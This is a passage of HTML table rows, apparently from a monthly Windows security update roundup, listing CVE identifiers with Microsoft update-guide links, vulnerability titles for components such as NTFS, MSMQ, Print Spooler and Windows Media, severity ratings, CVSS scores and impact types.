  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50396"><span>CVE-2026-50396</span></a></td>
  <td width="256" class="xl74">Windows Kernel-Mode
  Driver Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50378"><span>CVE-2026-50378</span></a></td>
  <td width="256" class="xl74">Windows Key Guard
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50303"><span>CVE-2026-50303</span></a></td>
  <td width="256" class="xl74">Windows Key Guard
  Security Feature Bypass Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">SFB</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40378"><span>CVE-2026-40378</span></a></td>
  <td width="256" class="xl74">Windows Local Security
  Authority Subsystem Service (LSASS) Denial of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49799"><span>CVE-2026-49799</span></a></td>
  <td width="256" class="xl74">Windows Local Security
  Authority Subsystem Service (LSASS) Denial of Service Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50371"><span>CVE-2026-50371</span></a></td>
  <td width="256" class="xl74">Windows LUA File
  Virtualization Filter Driver Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58544"><span>CVE-2026-58544</span></a></td>
  <td width="256" class="xl74">Windows Management
  Services Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl67" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50404"><span>CVE-2026-50404</span></a></td>
  <td width="256" class="xl74">Windows Media
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl67" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50358"><span>CVE-2026-50358</span></a></td>
  <td width="256" class="xl74">Windows Media
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50336"><span>CVE-2026-50336</span></a></td>
  <td width="256" class="xl74">Windows Media
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50398"><span>CVE-2026-50398</span></a></td>
  <td width="256" class="xl74">Windows Media
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50414"><span>CVE-2026-50414</span></a></td>
  <td width="256" class="xl74">Windows Media
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50379"><span>CVE-2026-50379</span></a></td>
  <td width="256" class="xl74">Windows Media
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50433"><span>CVE-2026-50433</span></a></td>
  <td width="256" class="xl74">Windows Media
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50676"><span>CVE-2026-50676</span></a></td>
  <td width="256" class="xl74">Windows Media
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50677"><span>CVE-2026-50677</span></a></td>
  <td width="256" class="xl74">Windows Media
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-34349"><span>CVE-2026-34349</span></a></td>
  <td width="256" class="xl74">Windows Media
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50394"><span>CVE-2026-50394</span></a></td>
  <td width="256" class="xl74">Windows Media
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50415"><span>CVE-2026-50415</span></a></td>
  <td width="256" class="xl74">Windows Media
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57083"><span>CVE-2026-57083</span></a></td>
  <td width="256" class="xl74">Windows Media Photo
  Codec Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54115"><span>CVE-2026-54115</span></a></td>
  <td width="256" class="xl74">Windows Message
  Queuing (MSMQ) Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="73">
  <td class="xl67" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50447"><span>CVE-2026-50447</span></a></td>
  <td width="256" class="xl74">Windows Message
  Queuing Service (MSMQ) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">9.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="73">
  <td class="xl67" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50505"><span>CVE-2026-50505</span></a></td>
  <td width="256" class="xl74">Windows Message
  Queuing Service (MSMQ) Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50342"><span>CVE-2026-50342</span></a></td>
  <td width="256" class="xl74">Windows MIDI Service
  Module Elevation of Privileges Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56183"><span>CVE-2026-56183</span></a></td>
  <td width="256" class="xl74">Windows MIDI Service
  Module Elevation of Privileges Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56187"><span>CVE-2026-56187</span></a></td>
  <td width="256" class="xl74">Windows MIDI Service
  Module Elevation of Privileges Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58635"><span>CVE-2026-58635</span></a></td>
  <td width="256" class="xl74">Windows Narrator
  Braille Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50500"><span>CVE-2026-50500</span></a></td>
  <td width="256" class="xl74">Windows Netlogon
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="73">
  <td class="xl67" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50476"><span>CVE-2026-50476</span></a></td>
  <td width="256" class="xl74">Windows Network
  Connections Service Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="73">
  <td class="xl67" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50450"><span>CVE-2026-50450</span></a></td>
  <td width="256" class="xl74">Windows Network
  Connections Service Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56650"><span>CVE-2026-56650</span></a></td>
  <td width="256" class="xl74">Windows Network File
  System Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="73">
  <td class="xl67" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56649"><span>CVE-2026-56649</span></a></td>
  <td width="256" class="xl74">Windows Network File
  System Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.9</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="73">
  <td class="xl67" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50470"><span>CVE-2026-50470</span></a></td>
  <td width="256" class="xl74">Windows Network Policy
  Server SNMP Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="73">
  <td class="xl67" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50496"><span>CVE-2026-50496</span></a></td>
  <td width="256" class="xl74">Windows Network Policy
  Server SNMP Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56194"><span>CVE-2026-56194</span></a></td>
  <td width="256" class="xl74">Windows NFS Server
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56648"><span>CVE-2026-56648</span></a></td>
  <td width="256" class="xl74">Windows NFS Server
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50337"><span>CVE-2026-50337</span></a></td>
  <td width="256" class="xl74">Windows Notification
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49789"><span>CVE-2026-49789</span></a></td>
  <td width="256" class="xl74">Windows NTFS Elevation
  of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50412"><span>CVE-2026-50412</span></a></td>
  <td width="256" class="xl74">Windows NTFS Elevation
  of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50422"><span>CVE-2026-50422</span></a></td>
  <td width="256" class="xl74">Windows NTFS Elevation
  of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50672"><span>CVE-2026-50672</span></a></td>
  <td width="256" class="xl74">Windows NTFS Elevation
  of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56175"><span>CVE-2026-56175</span></a></td>
  <td width="256" class="xl74">Windows NTFS Elevation
  of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56182"><span>CVE-2026-56182</span></a></td>
  <td width="256" class="xl74">Windows NTFS Elevation
  of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50341"><span>CVE-2026-50341</span></a></td>
  <td width="256" class="xl74">Windows NTFS
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58640"><span>CVE-2026-58640</span></a></td>
  <td width="256" class="xl74">Windows NTFS Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49184"><span>CVE-2026-49184</span></a></td>
  <td width="256" class="xl74">Windows NTFS Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.4</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49797"><span>CVE-2026-49797</span></a></td>
  <td width="256" class="xl74">Windows NTFS Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50308"><span>CVE-2026-50308</span></a></td>
  <td width="256" class="xl74">Windows NTFS Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50386"><span>CVE-2026-50386</span></a></td>
  <td width="256" class="xl74">Windows NTFS Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50309"><span>CVE-2026-50309</span></a></td>
  <td width="256" class="xl74">Windows NTFS Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50313"><span>CVE-2026-50313</span></a></td>
  <td width="256" class="xl74">Windows NTFS Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50388"><span>CVE-2026-50388</span></a></td>
  <td width="256" class="xl74">Windows NTFS Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50448"><span>CVE-2026-50448</span></a></td>
  <td width="256" class="xl74">Windows NTFS Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50471"><span>CVE-2026-50471</span></a></td>
  <td width="256" class="xl74">Windows NTFS Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50461"><span>CVE-2026-50461</span></a></td>
  <td width="256" class="xl74">Windows NTFS Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50417"><span>CVE-2026-50417</span></a></td>
  <td width="256" class="xl74">Windows NTFS Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50482"><span>CVE-2026-50482</span></a></td>
  <td width="256" class="xl74">Windows NTFS Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50494"><span>CVE-2026-50494</span></a></td>
  <td width="256" class="xl74">Windows NTFS Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50344"><span>CVE-2026-50344</span></a></td>
  <td width="256" class="xl74">Windows OLE Elevation
  of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50686"><span>CVE-2026-50686</span></a></td>
  <td width="256" class="xl74">Windows OLE Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50335"><span>CVE-2026-50335</span></a></td>
  <td width="256" class="xl74">Windows Operating
  Systems Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50317"><span>CVE-2026-50317</span></a></td>
  <td width="256" class="xl74">Windows Operating
  Systems Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54987"><span>CVE-2026-54987</span></a></td>
  <td width="256" class="xl74">Windows Overlay Filter
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50435"><span>CVE-2026-50435</span></a></td>
  <td width="256" class="xl74">Windows Overlay Filter
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50409"><span>CVE-2026-50409</span></a></td>
  <td width="256" class="xl74">Windows Overlay Filter
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40400"><span>CVE-2026-40400</span></a></td>
  <td width="256" class="xl74">Windows PowerShell
  Remote Code Execution Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49166"><span>CVE-2026-49166</span></a></td>
  <td width="256" class="xl74">Windows Print
  Configuration Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55004"><span>CVE-2026-55004</span></a></td>
  <td width="256" class="xl74">Windows Print
  Configuration Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50499"><span>CVE-2026-50499</span></a></td>
  <td width="256" class="xl74">Windows Print Spooler
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50383"><span>CVE-2026-50383</span></a></td>
  <td width="256" class="xl74">Windows Print Spooler
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57085"><span>CVE-2026-57085</span></a></td>
  <td width="256" class="xl74">Windows Print Spooler
  Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50469"><span>CVE-2026-50469</span></a></td>
  <td width="256" class="xl74">Windows Projected File
  System Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50434"><span>CVE-2026-50434</span></a></td>
  <td width="256" class="xl74">Windows Push
  Notification Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50339"><span>CVE-2026-50339</span></a></td>
  <td width="256" class="xl74">Windows Push
  Notification Information Disclosure Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">5.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
